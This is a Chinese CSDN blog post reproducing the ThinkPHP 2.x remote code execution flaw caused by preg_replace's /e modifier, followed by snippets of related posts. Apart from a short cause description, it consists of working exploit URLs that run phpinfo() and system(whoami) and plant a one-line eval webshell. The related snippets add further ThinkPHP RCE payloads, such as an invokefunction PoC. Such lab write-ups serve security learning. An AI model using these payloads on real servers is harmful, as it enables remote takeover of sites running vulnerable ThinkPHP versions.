thinkphp-2x-rce 代码执行漏洞复现

已于 2024-04-03 09:46:05 修改
阅读量389 收藏 1
点赞数
文章标签: 安全
于 2022-09-06 10:04:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42675091/article/details/126718971
版权
本文详细介绍了ThinkPHP2.x版本中由于preg_replace的/e模式使用,导致的安全漏洞,允许攻击者通过特定URL执行任意代码,如phpinfo()和system命令。提供了一句话上传payload进行复现,并探讨了该漏洞的影响和防范措施。
摘要由CSDN通过智能技术生成

1.漏洞描述

        ThinkPHP框架 - 是由上海顶想公司开发维护的MVC结构的开源PHP框架,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。 ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。

2.漏洞复现

        直接访问http://ip:55048/index.php?s=/index/index/name/$%7B@phpinfo()%7D可以执行phpinfo()

01b48336b37b4d4ba7a48b813a7e9985.png

可以执行任意代码: 

/index.php?s=/index/index/xxx/${system(whoami)}

e625e21c23fd473ba4f75a92bd4b5c5d.png

3.一句话上传

http://ip:55048/index.php?s=a/b/c/${@print(eval($_POST[1]))}

971052d56360431c90b3b2a25fd7d35d.png

 237f5113c95f4b57add9d3851f5836d7.png

 

 

weixin_42675091
关注
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce
qq_51577576的博客
10-02 2290
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce 漏洞复现 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞
thinkphp-2x-rce 代码执行
weixin_46580614的博客
08-20 875
thinkphp-2x-rce 代码执行 漏洞描述 ​ ThinkPHP框架 - 是由上海顶想公司开发维护的MVC结构的开源PHP框架,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。 ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞 影响版本 Thinkphp 2.x的版本 实验环境 攻击机:win10 靶机:vulfocus平台 thinkphp-2x-rce
Thinkphp 2.x rce
qq_53086690的博客
11-23 940
Thinkphp 2.x rce Thinkphp简介 Thinkphp 是一个开源的,快速、简单的面向对象的轻量级PHP开发框架 漏洞影响版本 Thinkphp 2.x 漏洞概述 ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); 导致用户的输入参数被插入双引号中执行
thinkphp-2x-rce 代码执行[VULFOCUS]
m0_37638874的博客
09-08 893
ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。s=/模块/控制器/操作/[参数名/参数值…http://serverName/index.php(或者其他应用入口文件)/模块/控制器/操作/[参数名/参数值…在ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由。值提取匹配的字符串,有几个括号就代表有几个匹配的字符串,看结果我们就知道,我们的目的是将。
ThinkPHP 2.x RCE
weixin_45439731的博客
07-26 311
preg_replace(‘正则规则’,‘替换字符’,‘目标字符’)即:在目标字符中寻找符合正则规则的字符,替换为替换字符,如果此时的正则规则中使用了/e这个修饰符,则存在代码执行漏洞。知识点:/e 修饰符配合preg_replace()函数使用,可以把匹配到的字符串当作正则表达式执行PHP版本在5.2~5.6可以执行,但在PHP>=7时,不支持/e修饰符。
vuhub thinkphp-5-rce漏洞复现
qq_46804551的博客
04-24 589
搭建 your-ip:8080 搭建成功 漏洞复现 ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5中,由于框架错误地处理了控制器名称,因此如果网站未启用强制路由(默认设置),则该框架可以执行任何方法,从而导致RCE漏洞。 poc: 它将执行phpinfo /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
漏洞通告ThinkPHP远程代码执行漏洞
05-05
漏洞通告】ThinkPHP远程代码执行漏洞
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
### ThinkPHP 5.0.x/5.1.x 变量覆盖远程代码执行RCE漏洞分析 #### 漏洞概述 ThinkPHP 5.0.x 和 5.1.x 版本中存在一个变量覆盖导致的远程代码执行RCE漏洞。该漏洞利用者可以通过对特定HTTP请求参数的精心...
thinkphp-2x-rce 1 代码执行
weixin_51558394的博客
08-17 492
thinkphp-2x-rce 代码执行
ThinkPHP3.2.x RCE漏洞通报1
08-03
3.寻找程序上传,上传件 1.功能代码中的assign法中第个变量为可控变量: 3.赋值结束后进display法中,display法开始解析并获取模板件内容,此
ThinkPhp 代码执行 (CNVD-2018-24942)漏洞复现
beichenyyds的博客
03-03 5189
漏洞介绍 ThinkPHP5 存在远程代码执行漏洞。该漏洞由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。 影响版本: ThinkPHP 5.*,<5.1.31 ThinkPHP <=5.0.23 过程 1.开启靶场环境 2、在其地址增加路径与参数即可,最后是需要执行的命令 ls /tmp http://vulfocus.fofa.so:43095/index.php/?s=index/\think\app/invokefunctio
ThinkPHP5 5.0.23 远程代码执行漏洞复现
weixin_54786196的博客
09-01 482
是由于框架对控制器名没有进行敏感字符检测,导致在没有开启强制路由的情况下可能导致远程代码执行。至此 ThinkPHP5 5.0.23 远程代码执行漏洞 复现成功。id是我们执行的命令,可更换我们需要的命令。5.0.23和5.1.31之前的所有版本。改变传参方式 GET改为POST。访问靶机ip+端口号8080。使用burp抓到首页的包。
漏洞复现----24、ThinkPHP 2.x 任意代码执行漏洞
七天
07-13 1266
文章目录一、ThinkPHP简介二、preg_replace() 函数三、/e四、代码解析五、漏洞复现1、写入phpinfo()2、写入webshell 一、ThinkPHP简介 ThinkPHP是PHP语言的一种开源框架。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP5.0以上版本支持,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,ThinkPHP框架本身没有什么特别模块要求,具体的应用系统运行环境要求视开发所涉及的模块。 在ThinkP
thinkphp漏洞复现
YouthBelief的博客
10-25 3064
thinkphp漏洞前言一、thinkphp-2x-rce 代码执行0x01 漏洞描述0x02 影响版本0x03 漏洞利用0x04 漏洞修复二、thinkphp 代码执行 (CNVD-2018-24942)0x01 漏洞描述0x02 影响范围0x03 漏洞利用这就完成了,这边我们引用下大佬的poc0x04 漏洞修复三、 thinkphp3.2.x 代码执行0x01漏洞描述0x02影响范围0x03漏洞利用payload0x04漏洞修复四、thinkphp 命令执行 (CVE-2018-1002015)0x01
Thinkphp2.x 任意代码执行漏洞
Yang_99的博客
07-18 1008
1.漏洞复现 ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由: $res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); 导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。 2.POC http://your-ip:8080/index
thinkphp2-rce远程代码执行漏洞
最新发布
weixin_45653478的博客
04-27 450
ThinkPHP 2.x版本中,使用的/e模式匹配路由:导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞
Thinkphp 5.0.x-5.1.x 变量覆盖RCE漏洞深度解析
ThinkPHP 5.0.x 和 5.1.x 版本的变量覆盖 Remote Code Execution (RCE) 漏洞分析是一篇关于ThinkPHP框架安全问题的文章,由作者whip1ash在2019年发布。文章指出,在这些早期版本中,存在一个可能导致恶意代码执行的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值